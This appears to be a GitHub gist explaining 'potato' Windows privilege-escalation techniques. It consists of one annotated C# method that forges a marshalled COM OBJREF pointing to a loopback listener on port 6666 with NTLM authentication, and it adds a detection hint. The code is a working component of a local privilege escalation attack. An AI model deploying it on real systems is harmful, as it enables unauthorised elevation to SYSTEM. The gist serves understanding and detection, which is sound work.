
@FrankSpierings
Last active October 10, 2024 08:28
Understanding potatoes

The Marshalled OBJREF

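        /// <summary>
        /// Custom-marshalling hook that ignores the object being marshalled and writes a
        /// fixed, hand-built OBJREF_STANDARD blob to <paramref name="pStm"/>.
        /// </summary>
        /// <remarks>
        /// The blob's string binding names a TCP endpoint on loopback (127.0.0.1, port 6666)
        /// and its security binding names authentication service 0x0A. The parameters
        /// <paramref name="riid"/>, <paramref name="pv"/>, <paramref name="dwDestContext"/>,
        /// <paramref name="pvDestContext"/> and <paramref name="mshlflags"/> are not read.
        /// For detection work, the blob is recognisable by the "MEOW" signature followed by a
        /// loopback string binding on a port other than the RPC endpoint mapper's 135.
        /// </remarks>
        /// <param name="pStm">Stream that receives the marshalled OBJREF bytes.</param>
        unsafe void IMarshal.MarshalInterface(Windows.Win32.System.Com.IStream pStm, Guid* riid, void* pv, uint dwDestContext, void* pvDestContext, uint mshlflags)
        {
            // Layout references:
            // https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dcom/fe6c5e46-adf8-4e34-a8de-3f756c875f31
            // https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-oaut/58504586-e4af-44a3-be04-f1dc281b7429
            byte[] data = {
                // OBJREF header
                0x4D, 0x45, 0x4F, 0x57, // signature "MEOW"
                0x01, 0x00, 0x00, 0x00, // flags = OBJREF_STANDARD
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, // IID_IUnknown
                    // OBJREF_STANDARD: std (STDOBJREF). OXID/OID/IPID are hard-coded here,
                    // not taken from a live exporter in this method.
                    0x00, 0x00, 0x00, 0x00, // flags
                    0x01, 0x00, 0x00, 0x00, // cPublicRefs (count)
                    0x94, 0x09, 0x34, 0x76, 0xC0, 0xF0, 0x15, 0xD8, // Object Exporter ID (OXID)
                    0x19, 0x8F, 0x4A, 0xA2, 0xCE, 0x05, 0x60, 0x86, // Object ID (OID)
                    0xA3, 0x2A, 0x0F, 0x09, 0x24, 0xE8, 0x70, 0x2A, 0x85, 0x65, 0x3B, 0x33, 0x97, 0xAA, 0x9C, 0xEC, // Interface Pointer ID (IPID)
                    // OBJREF_STANDARD: saResAddr (DUALSTRINGARRAY); both counts are in 16-bit units
                    0x16, 0x00, // wNumEntries = 22 (everything from wTowerId through nullterm2)
                    0x12, 0x00, // wSecurityOffset = 18 (index of wAuthnSvc)
                    0x07, 0x00, // wTowerId = 0x07 (ncacn_ip_tcp)
                    // Network address, UTF-16-LE: 127.0.0.1[6666]
                    0x31, 0x00, 0x32, 0x00, 0x37, 0x00, 0x2E, 0x00, 0x30, 0x00, 0x2E, 0x00, 0x30, 0x00, 0x2E, 0x00, 0x31, 0x00, // "127.0.0.1"
                    0x5B, 0x00, 0x36, 0x00, 0x36, 0x00, 0x36, 0x00, 0x36, 0x00, 0x5D, 0x00, 0x00, 0x00, // "[6666]" plus the string's terminating NUL
                    0x00, 0x00, // nullterm1: ends the string-binding list
                    0x0A, 0x00, // wAuthnSvc = 0x0A (RPC_C_AUTHN_WINNT, i.e. NTLM)
                    0xFF, 0xFF, // reserved, must be 0xFFFF
                    0x00, 0x00, // aPrincName: empty null-terminated string
                    0x00, 0x00  // nullterm2: ends the security-binding list
            };

            uint written;
            // Pin the array and hand Write a pointer to its first element. Taking &data
            // instead yields the address of the managed array reference, so the stream
            // would receive the reference and adjacent stack memory rather than the bytes.
            fixed (byte* pData = data)
            {
                pStm.Write(pData, (uint)data.Length, &written);
            }
        }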